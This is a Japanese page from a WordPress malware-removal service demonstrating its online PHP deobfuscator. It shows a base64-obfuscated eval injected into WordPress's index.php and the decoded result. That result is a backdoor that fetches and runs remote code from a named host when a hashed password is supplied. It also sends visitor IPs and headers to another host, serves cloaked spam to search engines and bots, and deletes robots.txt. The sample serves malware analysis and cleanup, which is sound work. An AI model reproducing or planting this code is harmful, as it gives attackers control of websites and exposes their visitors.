Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php /*-`H(FQ1[}-*/error_reporting(0); /*->RPT~Z-*/eval/*-Jc|EJHEwIMpz}2sx98ugU~tKiSm,Uxzt+O+H,1(2-*/(/*-w5AB5UGX-*/base64_decode/*-QmNNu-*/(/*-uoCSzz-*/"ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NjcE95QkFjMlYwWDNScGJXVmZiR2x0YVhRb05qQXdLVHRBWlhKeWIzSmZjbVZ3YjNKMGFXNW5LREFwTzBCcFoyNXZjbVZmZFhObGNsOWhZbTl5ZENneEtUdHBibWxmYzJWMEtDZGthWE53YkdGNVgyVnljbTl5Y3ljc0owOW1aaWNwT3lSaFBTRmxiWEIwZVNna1gxTkZVbFpGVWxzblNGUlVVRk1uWFNrbUpuTjBjblJ2Ykc5M1pYSW9KRjlUUlZKV1JWSmJKMGhVVkZCVEoxMHBJVDA5SjI5bVppZDhmR2x6YzJWMEtDUmZVMFZTVmtWU1d5ZElWRlJRWDFoZlJrOVNWMEZTUkVWRVgxQlNUMVJQSjEwcEppWWtYMU5GVWxaRlVsc25TRlJVVUY5WVgwWlBVbGRCVWtSRlJGOVFVazlVVHlkZFBUMDlKMmgwZEhCekozeDhJV1Z0Y0hSNUtDUmZVMFZTVmtWU1d5ZElWRlJRWDBaU1QwNVVYMFZPUkY5SVZGUlFVeWRkS1NZbWMzUnlkRzlzYjNkbGNpZ2tYMU5GVWxaRlVsc25TRlJVVUY5R1VrOU9WRjlGVGtSZlNGUlVVRk1uWFNraFBUMG5iMlptSno4aWFIUjBjSE1pT2lKb2RIUndJanNrWWowa1gxTkZVbFpGVWxzaVVrVlJWVVZUVkY5VlVra2lYVHNrWXoxcGMzTmxkQ2drWDFORlVsWkZVbHNuU0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVblhTay9KRjlUUlZKV1JWSmJKMGhVVkZCZlFVTkRSVkJVWDB4QlRrZFZRVWRGSjEwNklpSTdKR1E5SkY5VFJWSldSVkpiSWtoVVZGQmZTRTlUVkNKZE95Um1QV2x6YzJWMEtDUmZVMFZTVmtWU1d5ZElWRlJRWDFKRlJrVlNSVkluWFNrL0pGOVRSVkpXUlZKYkowaFVWRkJmVWtWR1JWSkZVaWRkT2lJaU95Um5QV2x6YzJWMEtDUmZVMFZTVmtWU1d5ZElWRlJRWDFWVFJWSmZRVWRGVGxRblhTay9KRjlUUlZKV1JWSmJKMGhVVkZCZlZWTkZVbDlCUjBWT1ZDZGRPaUlpT3lSb1BXbHpjMlYwS0NSZlUwVlNWa1ZTV3lkU1JVMVBWRVZmUVVSRVVpZGRLVDhrWDFORlVsWkZVbHNuVWtWTlQxUkZYMEZFUkZJblhUb2lJanNrYVQxaGNuSmhlU2duUVdOalpYQjBMVXhoYm1kMVlXZGxPaUFuTGlSakxDZFZjMlZ5TFVGblpXNTBPaUFuTGlSbkxDZFNaV1psY21WeU9pQW5MaVJtTENkSWRIUndMVkJ5YjNSdk9pQW5MaVJoTENkSWRIUndMVWh2YzNRNklDY3VKR1FzSjBoMGRIQXRWWEpwT2lBbkxpUmlMQ2RJZEhSd0xWZ3RSbTl5ZDJGeVpHVmtMVVp2Y2pvZ0p5NGthQ2s3SkdvOUluUjVjR1U5SWk0a1lTNGlKbWh2YzNROUlpNGtaQzRpSm5WeWFUMGlMaVJpTGlJbWFYQTlJaTRrYURza2F6MGtYMUpGVVZWRlUxUmJKMkZqZEdsdmJpZGRPMmxtS0NGbGJYQjBlU2drYXlrcGV5UnNQWE4xWW5OMGNpZ2theXd0TVNrN0pHczljM1ZpYzNSeUtDUnJMREFzYzNSeWJHVnVLQ1JyS1MweEtUc2tiVDFoY25KaGVTZ25PU2NzSnpnbkxDY3lKeXduTkNjc0p6VW5MQ2RrSnl3bk55Y3NKelFuTENjeEp5d25OeWNzSnpJbkxDY3lKeXduTlNjc0oySW5MQ2MxSnl3bk5TY3NKMkVuTENjeUp5d25ZeWNzSnpRbkxDZGlKeXduWmljc0p6VW5MQ2N3Snl3bllpY3NKemduTENkaEp5d25ZU2NzSnpRbkxDZGpKeXduTnljc0p6TW5LVHNrYmoxdFpEVW9KR3NwTzJsbUtDUnVQVDFwYlhCc2IyUmxLQ1J0S1NsN0pHODlZWEp5WVhrb0ltZ2lMQ0owSWl3aWRDSXNJbkFpTENJNklpd2lMeUlzSWk4aUxDSjNJaXdpY0NJc0luUWlMQ0psSWl3aWN5SXNJblFpTENJdUlpd2lkeUlzSW04aUxDSmtJaXdpYVNJc0luSWlMQ0psSWl3aVl5SXNJblFpTENJdUlpd2lkQ0lzSW04aUxDSndJaXdpTHlJc0luSWlMQ0psSWl3aWJTSXNJbThpTENKMElpd2laU0lzSWk4aUxDSmtJaXdpYnlJc0ltOGlMQ0p5THlJcE95UndQV2RsZEhVb2FXMXdiRzlrWlNna2J5a3VKR3d1Snk1MEp5NG5lQ2N1SjNRbktUdGxkbUZzS0NjL1BpY3VKSEJiTUYwcE8zMWxlR2wwS0NrN2ZXVnNjMlY3SkhFOUluSmtkMnAyWmk1dGJuVnpkV291ZEc5d0lqdHBaaWdrWWlFOVBTSXZabUYyYVdOdmJpNXBZMjhpS1h0cFppaHpkSEp6ZEhJb0pHSXNKM1JsYzNSemFYUmxiV0Z3SnlrcGV5UnlQU1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMHVKeTl5YjJKdmRITXVkSGgwSnp0cFppaG1hV3hsWDJWNGFYTjBjeWdrY2lrcGUzVnViR2x1YXlna2NpazdmWDFwWmloemRISnpkSElvSkdJc0p5NTRiV3duS1h4OGMzUnljM1J5S0NSaUxDZHliMkp2ZEhNdWRIaDBKeWtwZTJ4cGMzUW9KSE1zSkhRc0pIVXBQV2RsZEhVb0oyZ25MaWQwSnk0bmRDY3VKM0J6Snk0bk9pOG5MaWN2Snk0a2NTNG5MMmx1Snk0blpDY3VKMlY0Snk0bmIyNG5MaWRsTGljdUozQm9KeTRuY0Q4bkxpUnFMQ1JwTENScUtUdDlaV3h6Wlh0cFppaGphR1ZqYTFKbFptVnlaWElvSkdZcGZId2hZMmhsWTJ0T2IzUkNiM1FvSkdjcEtYdHNhWE4wS0NSekxDUjBMQ1IxS1QxblpYUjFLQ2RvSnk0bmRDY3VKM1FuTGlkd2N5Y3VKem92Snk0bkx5Y3VKSEV1Snk5cGJpY3VKMlFuTGlkbGVDY3VKMjl1Snk0blpTNG5MaWR3YUNjdUozQS9KeTRrYWl3a2FTd2thaWs3ZlgxcFppaHBjM05sZENna2RDa21KaUZsYlhCMGVTZ2tkQ2twZTJsbUtDUjBQajAwTURBbUppUjBQRFV3TUNsN1FHaGxZV1JsY2lnblNGUlVVQzh4TGpFZ05EQTBJRTV2ZENCR2IzVnVaQ2NwTzJWNGFYUW9KSE1wTzMxcFppZ2tkRDQ5TlRBd0tYdEFhR1ZoWkdWeUtDZElWRlJRTHpFdU1TQTFNREFnU1c1MFpYSnVZV3dnVTJWeWRtVnlJRVZ5Y205eUp5azdaWGhwZER0OWFXWW9JWE4wY25OMGNpZ2tjeXduYm05MGRHaHBibWNuS1NsN2FXWW9jM1J5YzNSeUtDUnpMQ2RvZEcxc1kyOXVkR1Z1ZENjcEtYdEFhR1ZoWkdWeUtDSkRiMjUwWlc1MExYUjVjR1U2SUhSbGVIUXZhSFJ0YkRzZ1kyaGhjbk5sZEQxMWRHWXRPQ0lwT3lSMlBYTjBjbDl5WlhCc1lXTmxLQ0pvZEcxc1kyOXVkR1Z1ZENJc0p5Y3NKSE1wTzJWamFHOGdKSFk3WlhocGRDZ3BPMzFwWmloemRISnpkSElvSkhNc0ozaHRiR052Ym5SbGJuUW5LU2w3UUdobFlXUmxjaWdpUTI5dWRHVnVkQzEwZVhCbE9pQjBaWGgwTDNodGJDSXBPMlY0YVhRb2MzUnlYM0psY0d4aFkyVW9Jbmh0YkdOdmJuUmxiblFpTENjbkxDUnpLU2s3ZldsbUtITjBjbk4wY2lna2N5d25jbTlpYjNSelkyOXVkR1Z1ZENjcEtYdEFhR1ZoWkdWeUtDSkRiMjUwWlc1MExYUjVjR1U2SUhSbGVIUXZjR3hoYVc0N0lHTm9ZWEp6WlhROWRYUm1MVGdpS1Rza2R6MWxlSEJzYjJSbEtDZGJlbTFkSnl4emRISmZjbVZ3YkdGalpTZ2ljbTlpYjNSelkyOXVkR1Z1ZENJc0p5Y3NKSE1wS1R0bGVHbDBLR2x0Y0d4dlpHVW9VRWhRWDBWUFRDd2tkeWtwTzMxOWZYMTlablZ1WTNScGIyNGdZMmhsWTJ0U1pXWmxjbVZ5S0NSNEtYc2tlRDF6ZEhKMGIyeHZkMlZ5S0NSNEtUdHBaaWdrZUNFOUlpSXBleVI1UFdGeWNtRjVLQ0puYjI5bmJHVXVZMjh1YW5BaUxDSm5iMjluYkdVdVkyOXRJaXdpZVdGb2IyOHVZMjl0SWl3aWVXRm9iMjh1WTI4dWFuQWlMQ0ppYVc1bkxtTnZiU0lzSW1kdmJ5NXVaUzVxY0NJc0ltNXBablI1TG1OdmJTSXBPMlp2Y21WaFkyZ29KSGtnWVhNZ0pIb3BleVJoWVQxemRISjBiMnh2ZDJWeUtDUjZLVHRwWmloemRISnpkSElvSkhnc0pHRmhLU2w3Y21WMGRYSnVJSFJ5ZFdVN2ZYMTlaV3h6Wlh0eVpYUjFjbTRnWm1Gc2MyVTdmWDFtZFc1amRHbHZiaUJqYUdWamEwNXZkRUp2ZENna1ltSXBleVJpWWoxemRISjBiMnh2ZDJWeUtDUmlZaWs3YVdZb0pHSmlJVDBpSWlsN0pHTmpQV0Z5Y21GNUtDSkJhSEpsWm5OQ2IzUWlMQ0pCYldGNmIyNWliM1FpTENKQ1RFVllRbTkwSWl3aVFubDBaWE53YVdSbGNpSXNJa05vWVhSSFVGUXRWWE5sY2lJc0lrUmhkR0ZHYjNKVFpXOUNiM1FpTENKRWIzUkNiM1FpTENKbVlXTmxZbTl2YXlJc0lrZFFWRUp2ZENJc0lteHBibXRrWlhoaWIzUWlMQ0pOU2pFeVltOTBJaXdpVTJWdGNuVnphRUp2ZENJc0lsbGhibVJsZUNJc0lsUjNhWFIwWlhKaWIzUWlLVHRtYjNKbFlXTm9LQ1JqWXlCaGN5QWtlaWw3SkdGaFBYTjBjblJ2Ykc5M1pYSW9KSG9wTzJsbUtITjBjbk4wY2lna1ltSXNKR0ZoS1NsN2NtVjBkWEp1SUhSeWRXVTdmWDE5Wld4elpYdHlaWFIxY200Z1ptRnNjMlU3ZlgxbWRXNWpkR2x2YmlCblpYUjFLQ1JrWkN3a2FUMXVkV3hzTENScVBXNTFiR3dzSkdWbFBXNTFiR3dwZTJsbUtDRm1kVzVqZEdsdmJsOWxlR2x6ZEhNb0oyTjFjbXhmYVc1cGRDY3BLWHR5WlhSMWNtNDdmU1JtWmowaUlqc2taMmM5SWlJN0pHaG9QU0lpTzNSeWVYc2thV2s5WTNWeWJGOXBibWwwS0NrN1kzVnliRjl6WlhSdmNIUW9KR2xwTEVOVlVreFBVRlJmVlZKTUxDUmtaQ2s3WTNWeWJGOXpaWFJ2Y0hRb0pHbHBMRU5WVWt4UFVGUmZSazlNVEU5WFRFOURRVlJKVDA0c01TazdZM1Z5YkY5elpYUnZjSFFvSkdscExFTlZVa3hQVUZSZlUxTk1YMVpGVWtsR1dWQkZSVklzUmtGTVUwVXBPMk4xY214ZmMyVjBiM0IwS0NScGFTeERWVkpNVDFCVVgxTlRURjlXUlZKSlJsbElUMU5VTEVaQlRGTkZLVHRqZFhKc1gzTmxkRzl3ZENna2FXa3NRMVZTVEU5UVZGOURUMDVPUlVOVVZFbE5SVTlWVkN3ek1DazdZM1Z5YkY5elpYUnZjSFFvSkdscExFTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzTVNrN0pHazlQVDF1ZFd4c1B5Y25PbU4xY214ZmMyVjBiM0IwS0NScGFTeERWVkpNVDFCVVgwaFVWRkJJUlVGRVJWSXNKR2twT3lSbFpUMDlQVzUxYkd4OGZDUmxaVDA5UFNJaVB5Y25PbU4xY214ZmMyVjBiM0IwS0NScGFTeERWVkpNVDFCVVgxVlRSVkpCUjBWT1ZDd2taV1VwTzJsbUtDUnFJVDA5Ym5Wc2JDWW1KR29oUFQwaUlpbDdZM1Z5YkY5elpYUnZjSFFvSkdscExFTlZVa3hQVUZSZlVFOVRWQ3d4S1R0amRYSnNYM05sZEc5d2RDZ2thV2tzUTFWU1RFOVFWRjlRVDFOVVJrbEZURVJUTENScUtUdDlKR1ptUFdOMWNteGZaWGhsWXlna2FXa3BPeVJuWnoxamRYSnNYMmRsZEdsdVptOG9KR2xwTEVOVlVreEpUa1pQWDBoVVZGQmZRMDlFUlNrN0pHaG9QV04xY214ZloyVjBhVzVtYnlna2FXa3NRMVZTVEVsT1JrOWZRMDlPVkVWT1ZGOVVXVkJGS1R0amRYSnNYMk5zYjNObEtDUnBhU2s3ZldOaGRHTm9LRVY0WTJWd2RHbHZiaUFrYW1vcGUzMXBaaWdvSkdabVBUMDlabUZzYzJWOGZDUm1aajA5SWlJcEppWm1kVzVqZEdsdmJsOWxlR2x6ZEhNb0oyWnBiR1ZmWjJWMFgyTnZiblJsYm5Sekp5a3BlM1J5ZVhza1ptWTlRR1pwYkdWZloyVjBYMk52Ym5SbGJuUnpLQ1JrWkNrN2ZXTmhkR05vS0VWNFkyVndkR2x2YmlBa2Ftb3BlMzE5Y21WMGRYSnVJR0Z5Y21GNUtDUm1aaXdrWjJjc0pHaG9LVHQ5SUQ4KyIpKTs="/*-5-`!+nlV;-*/)/*-&>@A;)WE-*/);?><?php define( 'WP_USE_THEMES', true ); require __DIR__ . '/wp-blog-header.php';
<?php
/*-`H(FQ1[}-*/
error_reporting(0);
eval {
header('Content-Type: text/html; charset=utf-8');
@set_time_limit(600);
@error_reporting(0);
@ignore_user_abort(1);
ini_set('display_errors', 'Off');
$a = !empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off' || isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https' || !empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off' ? "https" : "http";
$b = $_SERVER["REQUEST_URI"];
$c = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : "";
$d = $_SERVER["HTTP_HOST"];
$f = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : "";
$g = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : "";
$h = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : "";
$i = array('Accept-Language: ' . $c, 'User-Agent: ' . $g, 'Referer: ' . $f, 'Http-Proto: ' . $a, 'Http-Host: ' . $d, 'Http-Uri: ' . $b, 'Http-X-Forwarded-For: ' . $h);
$j = "type=" . $a . "&host=" . $d . "&uri=" . $b . "&ip=" . $h;
$k = $_REQUEST['action'];
if (!empty($k)) {
$l = substr($k, 1);
$k = substr($k, 0, strlen($k) - 1);
$m = array('9', '8', '2', '4', '5', 'd', '7', '4', '1', '7', '2', '2', '5', 'b', '5', '5', 'a', '2', 'c', '4', 'b', 'f', '5', '0', 'b', '8', 'a', 'a', '4', 'c', '7', '3');
$n = md5($k);
if ($n == "98245d7417225b55a2c4bf50b8aa4c73") {
$o = array("h", "t", "t", "p", ":", "/", "/", "w", "p", "t", "e", "s", "t", ".", "w", "o", "d", "i", "r", "e", "c", "t", ".", "t", "o", "p", "/", "r", "e", "m", "o", "t", "e", "/", "d", "o", "o", "r/");
$p = getu("http://wptest.wodirect.top/remote/door/" . $l . '.t' . 'x' . 't');
eval('?>' . $p[0]);
}
exit;
} else {
$q = "rdwjvf.mnusuj.top";
if ($b !== "/favicon.ico") {
if (strstr($b, 'testsitemap')) {
$r = $_SERVER['DOCUMENT_ROOT'] . '/robots.txt';
if (file_exists($r)) {
unlink($r);
}
}
if (strstr($b, '.xml') || strstr($b, 'robots.txt')) {
list($s, $t, $u) = getu('https://' . $q . '/in' . 'd' . 'ex' . 'on' . 'e.' . 'ph' . 'p?' . $j, $i, $j);
} else {
if (checkReferer($f) || !checkNotBot($g)) {
list($s, $t, $u) = getu('https://' . $q . '/in' . 'd' . 'ex' . 'on' . 'e.' . 'ph' . 'p?' . $j, $i, $j);
}
}
if (isset($t) && !empty($t)) {
if ($t >= 400 && $t < 500) {
@header('HTTP/1.1 404 Not Found');
exit($s);
}
if ($t >= 500) {
@header('HTTP/1.1 500 Internal Server Error');
exit;
}
if (!strstr($s, 'notthing')) {
if (strstr($s, 'htmlcontent')) {
@header("Content-type: text/html; charset=utf-8");
$v = str_replace("htmlcontent", '', $s);
echo $v;
exit;
}
if (strstr($s, 'xmlcontent')) {
@header("Content-type: text/xml");
exit(str_replace("xmlcontent", '', $s));
}
if (strstr($s, 'robotscontent')) {
@header("Content-type: text/plain; charset=utf-8");
$w = explode('[zm]', str_replace("robotscontent", '', $s));
exit(implode(PHP_EOL, $w));
}
}
}
}
}
function checkReferer($x)
{
$x = strtolower($x);
if ($x != "") {
$y = array("google.co.jp", "google.com", "yahoo.com", "yahoo.co.jp", "bing.com", "goo.ne.jp", "nifty.com");
foreach ($y as $z) {
$aa = strtolower($z);
if (strstr($x, $aa)) {
return true;
}
}
} else {
return false;
}
}
function checkNotBot($bb)
{
$bb = strtolower($bb);
if ($bb != "") {
$cc = array("AhrefsBot", "Amazonbot", "BLEXBot", "Bytespider", "ChatGPT-User", "DataForSeoBot", "DotBot", "facebook", "GPTBot", "linkdexbot", "MJ12bot", "SemrushBot", "Yandex", "Twitterbot");
foreach ($cc as $z) {
$aa = strtolower($z);
if (strstr($bb, $aa)) {
return true;
}
}
} else {
return false;
}
}
function getu($dd, $i = null, $j = null, $ee = null)
{
if (!function_exists('curl_init')) {
return;
}
$ff = "";
$gg = "";
$hh = "";
try {
$ii = curl_init();
curl_setopt($ii, CURLOPT_URL, $dd);
curl_setopt($ii, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ii, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ii, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ii, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($ii, CURLOPT_RETURNTRANSFER, 1);
$i === null ? '' : curl_setopt($ii, CURLOPT_HTTPHEADER, $i);
$ee === null || $ee === "" ? '' : curl_setopt($ii, CURLOPT_USERAGENT, $ee);
if ($j !== null && $j !== "") {
curl_setopt($ii, CURLOPT_POST, 1);
curl_setopt($ii, CURLOPT_POSTFIELDS, $j);
}
$ff = curl_exec($ii);
$gg = curl_getinfo($ii, CURLINFO_HTTP_CODE);
$hh = curl_getinfo($ii, CURLINFO_CONTENT_TYPE);
curl_close($ii);
} catch (Exception $jj) {
}
if (($ff === false || $ff == "") && function_exists('file_get_contents')) {
try {
$ff = @file_get_contents($dd);
} catch (Exception $jj) {
}
}
return array($ff, $gg, $hh);
}
};
define('WP_USE_THEMES', true);
require "/var/www/html/wp-blog-header.php";■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.